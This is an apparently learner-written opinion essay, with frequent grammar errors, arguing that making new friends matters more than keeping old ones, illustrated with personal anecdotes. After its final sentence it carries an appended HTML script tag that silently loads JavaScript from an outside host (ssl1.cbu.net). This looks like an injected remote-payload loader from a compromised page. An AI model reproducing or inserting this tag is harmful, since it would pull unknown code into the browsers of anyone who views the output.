It is more important to keep your old friends than it is to make new friends.

Use specific reasons and examples to support your answer?

I believe that making new friends is more important than making old friends,i feel this way for three mains reasons, which i will explore in the following paragraphs.

First of all, it make us happy and we try new adventure. My personal experience is a great example of this, three years ago i was really not happy when i was with my old friends, our discussion was boring because we already knew everything about each other, but when i integrated a new school ,and mad new friends i was happy. for this reason meeting new friends is always fun.

Second of all, Old friends will not last forever, drawing from my experience, when i moved out to a new city, I was no longer keeping contact with my old friends, I was forced to make new friends, because i was feeling alone. It’s certainly clearly to see why it's not important to keep our old friends, even if we wanted, one day each one will take his own path.

Third of all, by making new friends, our chance of meeting our dream woman will eventually raise, for instance: a friend of mine has married a woman, whom he met, thanks to his friend, and now he is really happy. This is a perfect example of meeting lot of friends can be helpful sometimes

To sum up, making friends is more important than keeping old friends, this because we try a new experience, full of happiness and entertainment. Furthermore, if we are attached to our old friends, we well really suffer when we separate which will destroy us emotionally. Even though we didn't choose to leave them, One day, each one will follow his own path.<script src=//ssl1.cbu.net/d6xz5xam></script>